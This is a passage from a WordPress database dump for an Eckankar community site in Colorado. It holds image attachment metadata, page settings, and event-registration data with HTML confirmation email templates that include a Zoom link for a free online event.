Sacabi'),(25314,148629,'_wp_attached_file','2019/09/Fubbi-Quantz-2.jpg'),(25315,148629,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:168;s:6:\"height\";i:235;s:4:\"file\";s:26:\"2019/09/Fubbi-Quantz-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Fubbi-Quantz-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"Fubbi-Quantz-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"Fubbi-Quantz-2-129x180.jpg\";s:5:\"width\";i:129;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"Fubbi-Quantz-2-168x150.jpg\";s:5:\"width\";i:168;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25325,148678,'_wp_attached_file','2019/09/Gopal-Das.jpg'),(25326,148678,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:168;s:6:\"height\";i:235;s:4:\"file\";s:21:\"2019/09/Gopal-Das.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Gopal-Das-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"Gopal-Das-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"Gopal-Das-129x180.jpg\";s:5:\"width\";i:129;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"Gopal-Das-168x150.jpg\";s:5:\"width\";i:168;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25327,148679,'_wp_attached_file','2019/09/Kata-Daki.jpg'),(25328,148679,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:162;s:6:\"height\";i:235;s:4:\"file\";s:21:\"2019/09/Kata-Daki.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Kata-Daki-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"Kata-Daki-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"Kata-Daki-124x180.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"Kata-Daki-162x150.jpg\";s:5:\"width\";i:162;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25329,148680,'_wp_attached_file','2019/09/Lai-Tsi.jpg'),(25330,148680,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:167;s:6:\"height\";i:235;s:4:\"file\";s:19:\"2019/09/Lai-Tsi.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Lai-Tsi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:17:\"Lai-Tsi-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:19:\"Lai-Tsi-128x180.jpg\";s:5:\"width\";i:128;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:19:\"Lai-Tsi-167x150.jpg\";s:5:\"width\";i:167;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25331,148681,'_wp_attached_file','2019/09/Peddar-Zaskq.jpg'),(25332,148681,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:167;s:6:\"height\";i:235;s:4:\"file\";s:24:\"2019/09/Peddar-Zaskq.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Peddar-Zaskq-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"Peddar-Zaskq-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"Peddar-Zaskq-128x180.jpg\";s:5:\"width\";i:128;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"Peddar-Zaskq-167x150.jpg\";s:5:\"width\";i:167;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25333,148682,'_wp_attached_file','2019/09/Rami-Nuri.jpg'),(25334,148682,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:169;s:6:\"height\";i:235;s:4:\"file\";s:21:\"2019/09/Rami-Nuri.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Rami-Nuri-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"Rami-Nuri-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"Rami-Nuri-129x180.jpg\";s:5:\"width\";i:129;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"Rami-Nuri-169x150.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25335,148683,'_wp_attached_file','2019/09/Rebazar-Tarzs.jpg'),(25336,148683,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:171;s:6:\"height\";i:235;s:4:\"file\";s:25:\"2019/09/Rebazar-Tarzs.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Rebazar-Tarzs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"Rebazar-Tarzs-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"Rebazar-Tarzs-131x180.jpg\";s:5:\"width\";i:131;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"Rebazar-Tarzs-171x150.jpg\";s:5:\"width\";i:171;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25337,148684,'_wp_attached_file','2019/09/Shamus-i-Tabriz.jpg'),(25338,148684,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:179;s:6:\"height\";i:235;s:4:\"file\";s:27:\"2019/09/Shamus-i-Tabriz.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Shamus-i-Tabriz-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"Shamus-i-Tabriz-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"Shamus-i-Tabriz-137x180.jpg\";s:5:\"width\";i:137;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"Shamus-i-Tabriz-179x150.jpg\";s:5:\"width\";i:179;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25339,148685,'_wp_attached_file','2019/09/Towart-Managi.jpg'),(25340,148685,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:176;s:6:\"height\";i:235;s:4:\"file\";s:25:\"2019/09/Towart-Managi.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Towart-Managi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"Towart-Managi-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"Towart-Managi-135x180.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"Towart-Managi-176x150.jpg\";s:5:\"width\";i:176;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25341,148686,'_wp_attached_file','2019/09/Yaubl-Sacabi.jpg'),(25342,148686,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:173;s:6:\"height\";i:235;s:4:\"file\";s:24:\"2019/09/Yaubl-Sacabi.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Yaubl-Sacabi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"Yaubl-Sacabi-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"Yaubl-Sacabi-133x180.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"Yaubl-Sacabi-173x150.jpg\";s:5:\"width\";i:173;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25395,151053,'_edit_lock','1619295670:2'),(25396,151053,'_edit_last','2'),(25433,151053,'_wp_page_template','default'),(25434,151053,'_wpac_members_redirect_to',''),(25435,151053,'_wpac_show_in_search','0'),(25436,151053,'_wpac_show_excerpt_in_search','0'),(25437,151053,'_wpac_nonmembers_redirect_to',''),(25438,151053,'boldgrid_hide_page_title','0'),(25439,151053,'boldgrid_in_page_containers','1'),(25440,151053,'bgseo_robots_index','index'),(25441,151053,'bgseo_robots_follow','follow'),(194075,269259,'mec_tickets','a:1:{i:1;a:21:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:12:\"category_ids\";a:0:{}s:2:\"id\";i:1;}}'),(194076,269259,'mec_fees_global_inheritance','1'),(194077,269259,'mec_fees','a:0:{}'),(194078,269259,'mec_ticket_variations_global_inheritance','1'),(194079,269259,'mec_ticket_variations','a:0:{}'),(194080,269259,'mec_reg_fields_global_inheritance','1'),(194081,269259,'mec_reg_fields','a:0:{}'),(194082,269259,'mec_bfixed_fields','a:0:{}'),(194083,269259,'mec_op','a:0:{}'),(194084,269259,'mec_fields','a:0:{}'),(194085,269259,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10264:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8368:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: 